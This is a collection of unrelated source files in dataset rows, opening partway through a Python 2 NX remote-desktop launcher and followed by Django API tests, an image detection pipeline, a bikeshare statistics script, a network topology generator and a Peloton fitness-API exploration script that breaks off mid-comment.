                os.kill(self.pid, signal.SIGTERM)
                raise
            # Wait for the server to disambiguate itself
            SERVER_STARTUP_TIMEOUT = 10
            POLL_INTERVAL = 0.05
            for i in range(int(SERVER_STARTUP_TIMEOUT / POLL_INTERVAL)):
                if process.poll() is not None \
                       or self.is_waiting_for_connection():
                    break
                time.sleep(POLL_INTERVAL)
            if process.poll() is None and self.is_waiting_for_connection():
                # Run ~/.nxstartup
                nxstartup = path('~/.nxstartup').expanduser()
                if nxstartup.isfile():
                    userinfo = pwd.getpwuid(os.getuid())
                    shell = userinfo.pw_shell
                    home = userinfo.pw_dir
                    # Run the user's startup file under a clean login
                    # shell with only the essential environment set.
                    subprocess.Popen(['env', '-',
                        'DISPLAY=:%d' % self.display,
                        # I don't know why 'env - sh -l foo' leaves HOME unset
                        'HOME=%s' % userinfo.pw_dir,
                        'SHELL=%s' % shell,
                        'USER=%s' % userinfo.pw_name,
                        shell, '-l', nxstartup],
                        stdout=session_file, stderr=subprocess.STDOUT)
            else:
                # Startup failed or timed out: reap the agent (it may
                # already be gone, hence the OSError guard) and report
                # failure via the cookie sentinel.
                try:
                    if process.poll() is None:
                        os.kill(process.pid, signal.SIGTERM)
                except OSError:
                    pass
                self.cookie = FAILURE_SENTINEL
    def accept_new_connection(self):
        """Signal the running agent to accept a new proxy connection."""
        # HUPing the agent while it is accepting connections tells it
        # to stop accepting connections. So don't HUP it in that case.
        if not self.is_waiting_for_connection():
            os.kill(self.pid, signal.SIGHUP)
    def is_waiting_for_connection(self):
        """True if the last session-log line says the agent is waiting."""
        statuses = self.session_dir.joinpath('session').lines()
        last_status = statuses[-1] if statuses else ""
        return 'Waiting for connection'.lower() in last_status.lower()
    def read_cookie_from_options(self):
        """Recover self.cookie from the session's options file."""
        options = self.session_dir.joinpath('options').text()
        self.cookie = split_option_str(options)['cookie']
    def listen(self):
        """Ensure an agent is ready: resume a running one or start fresh."""
        if self.is_running():
            self.accept_new_connection()
            self.read_cookie_from_options()
        else:
            self.start()
def main(args=None):
    """Entry point.

    Client mode (default): ssh to the remote host, run this script there
    in --server mode, read the printed cookie back over the pipe, then
    exec nxproxy against the forwarded port.  Server mode (-S): start or
    resume the local nxagent and print its cookie for the client side.
    Returns a shell-style exit status (0/1) or never returns (execvp).
    """
    if args is None:
        args = sys.argv[1:]
    optp = OptionParser(usage=__doc__)
    default_remote_options = "link=1m,cache=64m,images=128m,taint=1"
    optp.add_option('--remote-options', action='append', dest='remote_options',
        default=[], help="""Options to pass to nxagent when starting
        it. See `nxproxy -help` for more. Default is %s""" %
        default_remote_options)
    optp.add_option('--local-options', action='append', dest='local_options',
        default=[], metavar='OPTIONS')
    optp.add_option('-p', '--local-port', default=None, type=int,
        metavar='PORT', dest='local_port', help ="""Use TCP port PORT
        for the local NX proxy endpoint.""")
    optp.add_option('--remote-viewnx-cmd', dest='viewnx_cmd', default='viewnx',
        help="Location of viewnx if not on $PATH", metavar='COMMAND')
    optp.add_option('-S', '--server', action='store_true', dest='server_mode')
    optp.add_option('--name', dest='name', default=None, help="Window name")
    (options, args) = optp.parse_args(args)
    if len(args) != 1:
        optp.print_help()
        return 1
    # The single positional argument is "host:display".
    display_spec = args[0]
    host, display = display_spec.split(':', 1)
    display = int(display)
    if options.server_mode:
        options.remote_options = (options.remote_options
                or [default_remote_options])
        agent = LocalNXAgent(display, options.remote_options,
                name=options.name)
        agent.listen()
        # The client side parses exactly this 'Cookie: ...' line.
        print 'Cookie:', agent.cookie
        if agent.cookie == FAILURE_SENTINEL:
            # Dump the agent's log to stderr so the client can show it.
            print >> sys.stderr, 'nxagent start failed. Log file:\n'
            print >> sys.stderr, \
                "".join(agent.session_dir.joinpath('session').lines()),
    else:
        # ssh to host with port binding
        # run viewnx -S (yields cookie)
        # locally run nxproxy -S localhost:bound cookie=cookie
        remote_port = LocalNXAgent.port_from_display(display)
        if options.local_port is None:
            options.local_port = remote_port
        # This part is kind of yucky; we ssh and assume we get a shell
        # We run this command in server mode
        # Wait for a cookie to come back
        # If either party returns too much or too little at any point
        # deadlock
        proc = subprocess.Popen([
            'ssh', '-T',
            # You should have this in your ~/.ssh/config too!
            '-o', 'ExitOnForwardFailure=yes',
            '-L', 'localhost:%d:localhost:%d'
                % (options.local_port, remote_port),
            host],
            stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1)
        try:
            # Abort the remote shell on the first failing command.
            proc.stdin.write('set -e\n')
            cmd = [options.viewnx_cmd, '--server', display_spec]
            if options.name is not None:
                cmd += ['--name', options.name]
            for opt in options.remote_options:
                cmd += ['--remote-options', opt]
            def cmd_to_sh(arglist):
                # Single-quote each argument for the remote shell.
                def q(arg):
                    return "'%s'" % arg.replace("'", "'\''")
                return " ".join(q(arg) for arg in arglist)
            proc.stdin.write(cmd_to_sh(cmd) + '\n')
            cookieline = proc.stdout.readline().strip()
            failure_pattern = '^Cookie: %s$' % FAILURE_SENTINEL
            match = re.match(failure_pattern, cookieline)
            if match:
                # Remote start failed; relay its log output and bail.
                proc.stdin.close()
                print proc.stdout.read(),
                return 1
            cookie_pattern = '^Cookie: ([a-f0-9]{32})$'
            match = re.match(cookie_pattern, cookieline)
            if not match:
                proc.stdin.close()
                raise Exception(('Expected a cookie specification '
                    'in the form %s from %s, got %s instead.')
                    % (repr(cookie_pattern), repr(cmd),
                       repr(cookieline + proc.stdout.read())))
            cookie = match.groups()[0]
            try:
                proxy_options = {
                    'cookie': cookie,
                    # NOTE(review): 'kill' presumably tells nxproxy to
                    # signal the ssh pid when it exits — confirm against
                    # the nxproxy option documentation.
                    'kill': proc.pid,
                }
                for optstr in options.local_options:
                    proxy_options.update(split_option_str(optstr))
                # Options file contains the cookie, so keep it private.
                os.umask(077)
                option_filename = get_nx_root().joinpath(
                    'S-%d' % display, 'options')
                if not option_filename.parent.isdir():
                    option_filename.parent.makedirs()
                write_options(option_filename, proxy_options, display)
                # Replace this process with nxproxy; on success nothing
                # after this line runs.
                os.execvp('nxproxy', ['nxproxy', '-S',
                    'localhost:%d' % display,
                    "options=%s" % option_filename])
            except OSError, e:
                print >> sys.stderr, ('nxproxy failed to launch. '
                    'Please make sure it is in your PATH.')
                raise
        except:
            # Don't orphan the ssh process
            if proc.poll() is None:
                os.kill(proc.pid, signal.SIGTERM)
            raise
# Standard script entry point: run main() and use its return value as the
# process exit status.
if __name__ == '__main__':
    sys.exit(main())
|
17,063 | d10761791ca285a68a7d3479b6ae9b4506004142 | from sdk.types import TypeUuid, TypeString, TypeBase, TypeInteger
class UserId(TypeUuid):
    # UUID-typed identifier for a user; all validation is inherited from TypeUuid.
    pass
class UserName(TypeString):
    """Required user-name value object: must be longer than 2 characters."""

    def validate(self, value_name=''):
        """Run the base string validation, then enforce the minimum length.

        Raises:
            Exception: if the value is required and shorter than 3 characters.
        """
        super().validate('Nombre de usuario')
        # len() is the idiomatic way to obtain a string's length
        # (the original called self._value.__len__() directly).
        if self.is_required() and len(self._value) < 3:
            raise Exception("El nombre debe ser mayor a 2 caracteres")
class UserLastName(TypeString):
    """Optional last-name value object: when present, must exceed 3 characters."""

    def __init__(self, value: str):
        # The last name is optional: required=False is passed to the base type.
        super().__init__(value, False)

    def validate(self, value_name=''):
        """Run the base string validation, then enforce the minimum length.

        Raises:
            Exception: if a value is present and shorter than 4 characters.
        """
        super().validate('Apellido')
        # len() is the idiomatic way to obtain a string's length
        # (the original called self._value.__len__() directly).
        if self.is_not_none() and len(self._value) < 4:
            raise Exception("El apellido debe ser mayor a 3 caracteres")
class UserYear(TypeInteger):
    # Age value object: must be a non-negative integer when required.
    def validate(self, value_name=''):
        # NOTE(review): unlike the sibling types, no display name is passed to
        # the base validator here — confirm whether one (e.g. 'Edad') was intended.
        super().validate()
        # NOTE(review): the check allows 0, but the message says the age must be
        # greater than zero — confirm which behavior is intended.
        if self.is_required() and self._value < 0:
            raise Exception("la edad tiene que ser mayor que cero")
class User:
    """Plain data holder for an already-validated user."""

    def __init__(self, id, name, last_name):
        # Store the validated primitive values as-is.
        self.id, self.name, self.last_name = id, name, last_name
class UserFactory:
    """Builds validated User instances from raw input values."""

    @staticmethod
    def create(id, name, last_name) -> User:
        """Wrap the raw values in their value objects, validate them, build a User."""
        user_id = UserId(id)
        user_name = UserName(name)
        user_last_name = UserLastName(last_name)
        UserFactory._validate([user_id, user_name, user_last_name])
        return User(user_id.value(), user_name.value(), user_last_name.value())

    @staticmethod
    def _validate(value_objects):
        """Run validation on every value object in the given list."""
        for value_object in value_objects:  # type: TypeBase
            value_object.validate()
|
17,064 | 75ab687a036a1a0ccfe27e43d5508ed1c3933a8b | import uuid
from django.shortcuts import resolve_url
from rest_framework.test import APITestCase
from channels.models import Channel, Category
class ChannelApiTest(APITestCase):
    """API tests for the channel list and detail endpoints."""

    def setUp(self):
        # A single channel is enough to exercise both endpoints.
        self.channel = Channel.objects.create(name='market')

    def test_list(self):
        response = self.client.get(resolve_url('channel-list'))
        self.assertEqual(response.status_code, 200)

    def test_get(self):
        detail_url = resolve_url('channel-detail', pk=self.channel.uuid)
        response = self.client.get(detail_url)
        self.assertEqual(response.status_code, 200)

    def test_get_not_found(self):
        # A freshly generated UUID cannot match any stored channel.
        missing_url = resolve_url('channel-detail', pk=uuid.uuid4())
        self.assertEqual(self.client.get(missing_url).status_code, 404)
class CategoryApiTest(APITestCase):
    """API tests for category list/detail, including a nested subcategory."""

    def setUp(self):
        channel = Channel.objects.create(name='market')
        # One top-level category plus one child under it.
        self.category = Category.objects.create(
            name='book', channel=channel
        )
        self.category2 = Category.objects.create(
            name='book slim', channel=channel, parent=self.category
        )

    def test_list(self):
        response = self.client.get(resolve_url('category-list'))
        self.assertEqual(response.status_code, 200)

    def test_get(self):
        detail_url = resolve_url('category-detail', pk=self.category.pk)
        self.assertEqual(self.client.get(detail_url).status_code, 200)

    def test_get_not_found(self):
        # A freshly generated UUID cannot resolve to any category.
        missing_url = resolve_url('category-detail', pk=uuid.uuid4())
        self.assertEqual(self.client.get(missing_url).status_code, 404)

    def test_get_subcategory_detail(self):
        child_url = resolve_url('category-detail', pk=self.category2.pk)
        self.assertEqual(self.client.get(child_url).status_code, 200)
|
17,065 | cbe85a40a6fcf48b8d7a424c3fd955a7bde58e97 | from detec.dete import subway_det
from class_n.class_n_model import model_n
from class_2.class_2_model import model_2
from data import data_detile
from config import Config
import cv2
import numpy as np
from PIL import Image
class detector(object):
    # Detection + two-stage re-classification pipeline: detection boxes with a
    # low confidence score are re-checked by a coarse-grained and then a
    # fine-grained classifier before being kept or dropped.
    def __init__(self,config):
        self.config=config
        self.data=data_detile(self.config)
        # Load the detection module
        self.sud_det=subway_det(self.config.config_file,self.config.checkpoint_file,self.config)
        # Load the coarse-grained classification module
        self.Coarse_grained_class=model_n(self.config.model_path_Coarse_grained,self.data.transforms)
        # Load the fine-grained classification module
        self.fine_grained_class=model_2(self.config.model_path_fine_grained,self.data.transforms)
    def detecte(self,img):
        # Run detection on `img` (BGR ndarray) and return the accepted rows.
        # NOTE(review): each roi_list row appears to be
        # [x1, y1, x2, y2, ..., score, class] — confirm against subway_det.detector().
        self.result = []
        # Detection module
        self.roi_list = self.sud_det.detector(img)
        # Feed each ROI into the classification networks
        for i in range(self.roi_list.shape[0]):
            box=self.roi_list[i,0:4]
            confidence=self.roi_list[i,-2]
            class_name=self.roi_list[i,-1]
            # Only low-score boxes are re-classified here
            if float(confidence)>0.05:
                self.result.append(self.roi_list[i])
                continue
            else:
                # NOTE(review): np.int is deprecated/removed in recent NumPy
                # versions; plain int would be needed there.
                box=box.astype(np.int)
                # Crop the ROI, convert BGR -> RGB and resize for the classifiers
                img_test=img[box[1]:box[3],box[0]:box[2],:]
                img_test = Image.fromarray(cv2.cvtColor(img_test,cv2.COLOR_BGR2RGB))
                img_test=img_test.resize((self.config.size,self.config.size))
                # Coarse-grained classification
                class_name=self.Coarse_grained_class.test_img(img_test,flag=False,score_thr=0.5)
                if class_name[0][0]!=0:
                    continue
                else:
                    # Fine-grained classification
                    class_name=self.fine_grained_class.test_img(img_test,flag=False,score_thr=0.5)
                    if class_name[0][0]!=0:
                        continue
                    else:
                        # Store the classifier output in the detection row.
                        # NOTE(review): this overwrites column 0 (the x1
                        # coordinate), not the class column (-1) — looks like a
                        # bug; confirm intended behavior before changing.
                        self.roi_list[i, 0]=class_name[0][0]
                        self.result.append(self.roi_list[i])
        return self.result
if __name__ == '__main__':
    # Smoke test: run the full pipeline on a single sample image.
    # NOTE(review): hard-coded local path — only valid on the original machine.
    img_path='/media/cbird/新加卷1/miao/NS2/mix/1000-3000/all/img/1 (685).png'
    img=cv2.imread(img_path)
    cfg=Config()
    dete=detector(cfg)
    result=dete.detecte(img)
    print (result)
|
17,066 | 75f16e1df266b41924ea2e2e04c9c0561712d329 | import time
import pandas as pd
import numpy as np
# Map of supported city names to their CSV data files.
CITY_DATA = { 'chicago': 'chicago.csv',
              'new york': 'new_york_city.csv',
              'washington': 'washington.csv' }
# Accepted (lower-case) answers for each interactive prompt.
cities = ["chicago", "new york", "washington"]
filters = ["month", "day", "both", "none"]
months = ["all", "january", "february", "march", "april", "may","june"]
days = ["all", "monday", "tuesday", "wednesday", "thursday", "friday", "saturday", "sunday"]
# Prompt strings reused by the input-validation helper.
question_1 = "Would you like to see data for Chicago, New York, or Washington?\n"
question_2 = "Would you like to filter the data by month, day, both or not at all? Type none for no time filter\n"
question_3 = "Which month - January, February, March, April, May, or June?\n"
question_4 = "Which day - Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, or Sunday?\n"
def handle_invalid_inputs(question,my_list):
    """
    Prompt with *question* until the user types an answer contained in *my_list*.

    Args:
        (str) question - the prompt shown to the user.
        (list) my_list - the accepted answers (lower-case strings).

    Returns:
        (str) final_answer - the validated, lower-cased answer.
    """
    final_answer = None
    while final_answer not in my_list:
        # .strip() tolerates accidental leading/trailing whitespace and
        # .lower() makes the match case-insensitive; previously-valid inputs
        # are still accepted unchanged.
        final_answer = input(question).strip().lower()
    return final_answer
def get_month():
    """
    Ask the user which month to filter by (used when the chosen filter is "month").

    Returns:
        (str) month - name of the month, or "all".
    """
    return handle_invalid_inputs(question_3, months)
def get_day():
    """
    Ask the user which day to filter by (used when the chosen filter is "day").

    Returns:
        (str) day - name of the day of week, or "all".
    """
    return handle_invalid_inputs(question_4, days)
def get_both():
    """
    Ask the user for both a month and a day (used when the chosen filter is "both").

    Returns:
        (str) get_month() - the chosen month
        (str) get_day() - the chosen day
    """
    return get_month(), get_day()
def get_filters():
    """
    Asks user to specify a city, month, and day to analyze.

    Returns:
        (str) city - name of the city to analyze
        (str) month - month to filter by, or "all" for no month filter
        (str) day - day of week to filter by, or "all" for no day filter
        (str) filter_choosed - name of the chosen filter
    """
    print('Hello! Let\'s explore some US bikeshare data!')
    # Ask for the city, then for the kind of time filter to apply.
    city = handle_invalid_inputs(question_1, cities)
    filter_choosed = handle_invalid_inputs(question_2, filters)
    # Default to no filtering, then narrow down based on the user's choice
    # ("none" keeps both defaults).
    month, day = "all", "all"
    if filter_choosed == "month":
        month = get_month()
    elif filter_choosed == "day":
        day = get_day()
    elif filter_choosed == "both":
        month, day = get_both()
    print('-'*40)
    return city, month, day, filter_choosed
def load_data(city, month, day):
    """
    Loads data for the specified city and filters by month and day if applicable.

    Args:
        (str) city - name of the city to analyze
        (str) month - name of the month to filter by, or "all" to apply no month filter
        (str) day - name of the day of week to filter by, or "all" to apply no day filter
    Returns:
        df - Pandas DataFrame containing city data filtered by month and day
    """
    # load data file into a dataframe
    df = pd.read_csv(CITY_DATA[city])
    # convert the Start Time column to datetime
    df['Start Time'] = pd.to_datetime(df['Start Time'])
    # extract month, day of week and hour from Start Time to create new columns.
    # .dt.weekday_name was removed in pandas 1.0; .dt.day_name() returns the
    # same capitalized weekday strings (e.g. 'Monday') on all modern versions.
    df['month'] = df['Start Time'].dt.month
    df['day_of_week'] = df['Start Time'].dt.day_name()
    df['hour'] = df['Start Time'].dt.hour
    # filter by month if applicable
    if month != 'all':
        # use the index of the month list to get the corresponding int
        # (renamed from `months` to avoid shadowing the module-level constant)
        month_names = ["january", "february", "march", "april", "may", "june"]
        month = month_names.index(month) + 1
        # filter by month to create the new dataframe
        df = df[df['month'] == month]
    # filter by day of week if applicable
    if day != 'all':
        # filter by day of week to create the new dataframe
        df = df[df['day_of_week'] == day.title()]
    return df
def popular_counts_column(column):
    """
    Find the most frequent entry of a column and how often it occurs.

    Args:
        (pd.Series) column - column of a DataFrame

    Returns:
        most_common - the most frequent entry of the column
        occurrence_count - number of occurrences of that entry
    """
    most_common = column.mode()[0]
    occurrence_count = column.value_counts()[most_common]
    return most_common, occurrence_count
def time_stats(df, filter_choosed):
    """Displays statistics on the most frequent times of travel.

    Args:
        df - DataFrame with 'month', 'day_of_week' and 'hour' columns.
        filter_choosed - name of the active filter, echoed in the output.
    """
    print('\nCalculating The Most Frequent Times of Travel...\n')
    start_time = time.time()
    # display the most common month and number of occurrence
    popular_month, counts_month = popular_counts_column(df['month'])
    print('The Most Popular month:{}, Counts:{},'.format(popular_month, counts_month), end = ' ')
    # display the most common day of week and number of occurrence
    popular_day, counts_day = popular_counts_column(df['day_of_week'])
    print('The Most Popular day:{}, Counts:{},'.format(popular_day, counts_day), end = ' ')
    # display the most common start hour and number of occurrence
    popular_hour, counts_hour = popular_counts_column(df['hour'])
    print('The Most Popular hour:{}, Counts:{}, Filter:{}\n'.format(popular_hour, counts_hour, filter_choosed))
    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-'*40)
def station_stats(df, filter_choosed):
    """Displays statistics on the most popular stations and trip.

    Args:
        df - DataFrame with 'Start Station' and 'End Station' columns.
        filter_choosed - name of the active filter, echoed in the output.
    """
    print('\nCalculating The Most Popular Stations and Trip...\n')
    start_time = time.time()
    # display most commonly used start station
    popular_start, counts_start = popular_counts_column(df['Start Station'])
    print('Start Station:{}, Counts:{},'.format(popular_start, counts_start), end = ' ')
    # display most commonly used end station
    # (a stray, unused third argument to .format() was removed here)
    popular_end, counts_end = popular_counts_column(df['End Station'])
    print('End Station:{}, Counts:{},'.format(popular_end, counts_end), end = ' ')
    # display most frequent combination of start station and end station trip
    popular_start_end, counts_start_end = popular_counts_column(df['Start Station'] + '-' + df['End Station'])
    print("Popular Trip:('{}'-'{}'), Counts:{}, Filter:{}\n".format(popular_start_end.split('-')[0],popular_start_end.split('-')[1], counts_start_end, filter_choosed))
    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-'*40)
def trip_duration_stats(df, filter_choosed):
    """Displays statistics on the total and average trip duration.

    Args:
        df - DataFrame with a 'Trip Duration' column.
        filter_choosed - name of the active filter, echoed in the output.
    """
    print('\nCalculating Trip Duration...\n')
    start_time = time.time()
    durations = df['Trip Duration']
    # display total travel time and how many trips it covers
    print('Total Duration:{}, Count:{},'.format(durations.sum(), durations.size), end = ' ')
    # display mean travel time
    print('Avg Duration:{}, Filter:{}\n'.format(durations.mean(), filter_choosed))
    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-'*40)
def user_stats(df, city, filter_choosed):
    """Displays statistics on bikeshare users.

    Gender and birth-year columns are absent from the Washington data set,
    so those two sections are skipped for that city.
    """
    print('\nCalculating User Stats...\n')
    start_time = time.time()
    # Display counts of user types
    print('Statistics for User Types ...... \n')
    user_types_dict = dict(df['User Type'].value_counts())
    for key, value in user_types_dict.items():
        print('{}:{}'.format(key,value), end = ' ')
    print('filter:', filter_choosed)
    # Display counts of gender (not available for Washington)
    print('\nStatistics for gender ...... \n')
    if city != 'washington':
        gender_dict = dict(df['Gender'].value_counts())
        for key, value in gender_dict.items():
            print('{}:{}'.format(key,value), end = ' ')
        print(' filter:', filter_choosed)
    else:
        print('No data about gender')
    # Display earliest, most recent, and most common year of birth
    # (not available for Washington)
    print('\nStatistics for year of birth ...... \n')
    if city != 'washington':
        earliest_year = df['Birth Year'].min()
        most_recent_year = df['Birth Year'].max()
        popular_year = df['Birth Year'].mode()[0]
        print('Earliest Year:{}, Most Recent Year:{}, Most Popular Year:{}, filter:{}'.format(earliest_year, most_recent_year, popular_year, filter_choosed))
    else:
        print('No data about birth of year')
    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-'*40)
def individual_trip_data(df):
    """Interactively display raw trip records, five at a time.

    The previous implementation restarted from record 0 on every page and
    raised IndexError whenever fewer than five records remained; this version
    walks through the data in consecutive, bounds-safe 5-record pages and
    stops once all records have been shown.

    Args:
        df - the filtered trips DataFrame.
    """
    data = df.to_dict('records')
    length = len(data)
    start = 0
    while start < length:
        see_trip = input('\nWould you like to individual trip data? Type yes or no.\n')
        if see_trip.lower() != 'yes':
            break
        # Show the next page of up to five records (slicing never overruns).
        for record in data[start:start + 5]:
            print(record)
        start += 5
def main():
    """Top-level interactive loop: gather filters, load data, report statistics."""
    while True:
        city, month, day, filter_choosed = get_filters()
        df = load_data(city, month, day)
        # Run every statistics report against the filtered data.
        time_stats(df, filter_choosed)
        station_stats(df, filter_choosed)
        trip_duration_stats(df, filter_choosed)
        user_stats(df, city, filter_choosed)
        individual_trip_data(df)
        # Offer to run another analysis; anything but "yes" exits.
        restart = input('\nWould you like to restart? Enter yes or no.\n')
        if restart.lower() != 'yes':
            break
# Only run the interactive loop when executed as a script.
if __name__ == "__main__":
    main()
|
17,067 | 78d312dc52e14a7338e47e9f38620b476aba774b | from random import randint
import random
import sys
# Random network-topology generator (Python 2: uses print statements).
# Usage: script.py <num_nodes> <topo_type 1|2|3> <gain_low> <gain_max>
# Writes one "src dst gain" line per directed edge to topo.txt.
num_nodes = sys.argv[1]
topo_type = sys.argv[2]
gain_low = sys.argv[3]
gain_max = sys.argv[4]
num_nodes = int(num_nodes)
gain_low = float(gain_low)
gain_max = float(gain_max)
# Adjacency list: node id (1-based) -> list of neighbor ids.
nodes = {}
print num_nodes
print topo_type
print gain_low
print gain_max
for i in range(1,num_nodes+1):
    nodes[i] = []
# Topology type 1: tree — each node links to up to the next two unused ids.
if(topo_type == '1'):
    cur = 1
    for i in range(1,num_nodes+1):
        if(cur<(num_nodes)):
            nodes[i].append(cur+1)
            nodes[cur+1].append(i)
            cur += 1
        if(cur<(num_nodes-1)):
            nodes[i].append(cur+1)
            nodes[cur+1].append(i)
            cur += 1
# Topology type 2: chain — consecutive ids are linked.
if(topo_type == '2'):
    for i in range(1,num_nodes):
        nodes[i].append(i+1)
        nodes[i+1].append(i)
# Topology type 3: random graph — each node is given 1-3 (or 1-4 for small
# networks) randomly chosen distinct neighbors.
if(topo_type == '3'):
    for i in range(1,num_nodes+1):
        if(num_nodes>4):
            num_of_neighbors = randint(1,3)
        else:
            num_of_neighbors = randint(1,4)
        for j in range(num_of_neighbors):
            neighbor = i
            # resample until the neighbor differs from the node itself
            while neighbor==i:
                neighbor = randint(1,num_nodes)
            if(neighbor not in nodes[i]):
                nodes[i].append(neighbor)
                nodes[neighbor].append(i)
# Emit each edge with a random gain rounded to one decimal place.
gain = 0.0
fd = open("topo.txt",'w')
for i in nodes.keys():
    for j in nodes[i]:
        gain = round(random.uniform(gain_low,gain_max),1)
        # Non-zero gains are written with a leading minus sign.
        # NOTE(review): confirm the sign convention is intentional
        # (e.g. path loss expressed in negative dB).
        if(gain != 0.0):
            gain = "-" + str(gain)
        else:
            gain = str(gain)
        fd.write(str(i) + " " + str(j) + " " + gain)
        fd.write("\n")
fd.close()
17,068 | c0611899d28595d8d7e87bbafe8466917e926d36 | import requests
import csv
import json
from datetime import datetime
# from datetime import timezone
# from datetime import date
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import pandas as pd
# Authenticate once; the session then carries the auth cookie for every
# later API call.
# NOTE(review): the credentials are placeholders — never commit real ones.
s = requests.Session()
payload = {'username_or_email':'<insert username>', 'password':'<insert password>'}
xx = s.post('https://api.onepeloton.com/auth/login', json=payload)
'''
The following script has been a way for me to play around with my own Peloton fitness data. My family's Peloton bicycle and my most recent download of the Peloton Digital Application
has been motivating my workouts during this period of social distancing. As a data person, I have been fascinated by the amount of data amassed, shared and available for visualization
while working out. At any given moment, there are people across the world riding with me, running with or stretching with me. I know when a friend has a taken a new class and I know if I have beat
my record from the previous day. How does Peloton do it? What is the data structure underlying and powering the app, the tablet, the website, the notifications?
I must give credit to
https://github.com/geudrik/peloton-api
https://rdrr.io/github/elliotpalmer/pelotonr/api/
where I found the API endpoints and could have used either library. But the best way to explore data is to struggle and wrangle with it myself while at the same time refamiliarizing myself
with Python, Pandas and data manipulation.
From what I have found, the API fields are clear, data is consistent and clear.
There are some funny quirks which seem to be a result from Peloton's growth- starting with cycling and movement to classes of all types
1. Nesting of data within 'ride' json field even for a "running" class, or
2. the total_output only included for cycling classes instead of creating a more standard way to calculate total output across all types of classes)
3. 'total_leaderboard' on top level of json also often empty.
I hope to continue to explore and document more of the fields and explain what they mean to better think of my workouts in the form of data.
'''
#########################################
##### Profile ######
#########################################
# meContent = s.get('https://api.onepeloton.com/api/me').json()
###### KEY NAMES
# [u'username', u'last_name', u'is_demo', u'weight', u'is_profile_private', u'cycling_ftp_workout_id', u'created_country', u'cycling_workout_ftp', u'height', u'is_provisional', u'cycling_ftp', u'id',
# u'total_pending_followers', u'block_explicit', u'facebook_access_token', u'customized_max_heart_rate', u'is_strava_authenticated', u'obfuscated_email', u'hardware_settings', u'is_complete_profile', u'instructor_id', u'v1_referrals_made',
# u'last_workout_at', u'location', u'is_internal_beta_tester', u'facebook_id', u'cycling_ftp_source', u'has_active_digital_subscription', u'email', u'phone_number', u'contract_agreements', u'middle_initial', u'quick_hits',
# u'external_music_auth_list', u'first_name', u'card_expires_at', u'birthday', u'has_signed_waiver', u'customized_heart_rate_zones', u'referrals_made', u'is_external_beta_tester',
# u'paired_devices', u'total_pedaling_metric_workouts', u'total_workouts', u'default_max_heart_rate', u'name', u'is_fitbit_authenticated', u'has_active_device_subscription', u'gender',
# u'created_at', u'workout_counts', u'total_non_pedaling_metric_workouts', u'member_groups', u'default_heart_rate_zones', u'image_url', u'total_following', u'estimated_cycling_ftp', u'can_charge', u'total_followers']
userid = "c3ff56ef4c834f8eb682e724494e1d27" # meContent['id'] — hard-coded to skip the profile call above
#########################################
#####            Workouts          ######
#########################################
# The workouts endpoint truncates to 20 per page, but workoutsFullEndpoint
# passes a limit parameter large enough to fetch everything in one request.
workoutsPagingEndpoint = 'https://api.onepeloton.com/api/user/%s/workouts' % (userid)
workoutsFullEndpoint = 'https://api.onepeloton.com/api/user/%s/workouts?joins=ride&limit=%s' % (userid, 200) #The number should be changed - but just putting in limit that I know is past the total number of workouts
workouts = s.get(workoutsFullEndpoint).json()
###### KEY NAMES
# [u'count', u'summary', u'page_count', u'show_next', u'sort_by', u'show_previous', u'next', u'limit', u'aggregate_stats', u'total', u'data', u'page']
# 'page_count' is the total number of pages and 'page' the current one; with
# the large limit above, pagination is effectively bypassed.
# The workout records themselves live under the 'data' key.
workoutData = workouts['data']
# Collect just the workout ids so the per-workout endpoints can be queried later.
listOfWorkoutIds = []
for workout in workoutData:
    # Sample workout: {u'workout_type': u'class', u'total_work': 0.0, ...}
    # Note: only cycling classes carry 'total_work' at the top level; for
    # other disciplines the data is nested inside 'ride'.
    workoutId = workout['id']
    listOfWorkoutIds.append(workoutId)
## Get Class details for an individual workout. For example (Stretching Class example): 8b83bece729648e0a8dc2671c66a3b66, Walking class: 3d4e2277bca743cfa839a7ffae6ff2ac
## This is the workout of a person for a particular class
## This has an associated peleton_id (To what is this associated?)
## The finalData list is a list of dictionaries to say output to csv if want to chart elsewhere (outside of python)
# finalData accumulates one dict per workout for the dataframe built below.
finalData = []
#########################################
#####       Specific Workout       ######
#########################################
# Per-workout detail endpoint; the class data lives inside the 'ride' key.
workoutDetailEndpoint = 'https://api.onepeloton.com/api/workout/%s'
#########################################
#####      Performance Graph       ######
#########################################
# Performance-graph endpoint: 'summaries' and 'average_summaries' hold
# distance, elevation, calories, pace etc. as lists of
# {display_name, slug, value, display_unit} dicts.
workoutPerformanceEndpoint = 'https://api.onepeloton.com/api/workout/%s/performance_graph'
# Joining ride.instructor returns the full ride dict plus instructor details
# (the ?joins=ride,ride.instructor variant is identical in practice).
workoutInstructorEndpoint = 'https://api.onepeloton.com/api/workout/%s?joins=ride.instructor'
'''
"created_at", "device_type", "end_time", "fitbit_id", "fitness_discipline", "has_pedaling_metrics", "has_leaderboard_metrics",
"id", "is_total_work_personal_record", "metrics_type", "name", "peloton_id", "platform", "start_time", "strava_id", "status",
"timezone", "title", "total_work", "user_id", "workout_type",
"ride",
"ride.instructor",
"ride.instructor.id",
"ride.instructor.bio",
"ride.instructor.short_bio",
"ride.instructor.coach_type",
"ride.instructor.is_filterable",
"ride.instructor.is_visible",
"ride.instructor.list_order",
"ride.instructor.featured_profile",
"ride.instructor.film_link",
"ride.instructor.facebook_fan_page",
"ride.instructor.music_bio",
"ride.instructor.spotify_playlist_uri",
"ride.instructor.background",
"ride.instructor.ordered_q_and_as",
"ride.instructor.instagram_profile",
"ride.instructor.strava_profile",
"ride.instructor.twitter_profile",
"ride.instructor.quote",
"ride.instructor.username",
"ride.instructor.name",
"ride.instructor.first_name",
"ride.instructor.last_name",
"ride.instructor.user_id",
"ride.instructor.life_style_image_url",
"ride.instructor.bike_instructor_list_display_image_url",
"ride.instructor.web_instructor_list_display_image_url",
"ride.instructor.ios_instructor_list_display_image_url",
"ride.instructor.about_image_url",
"ride.instructor.image_url",
"ride.instructor.jumbotron_url",
"ride.instructor.jumbotron_url_dark",
"ride.instructor.jumbotron_url_ios",
"ride.instructor.web_instructor_list_gif_image_url",
"ride.instructor.instructor_hero_image_url",
"ride.instructor.fitness_disciplines",
"ride.class_type_ids",
"ride.content_provider",
"ride.content_format",
"ride.description",
"ride.difficulty_estimate",
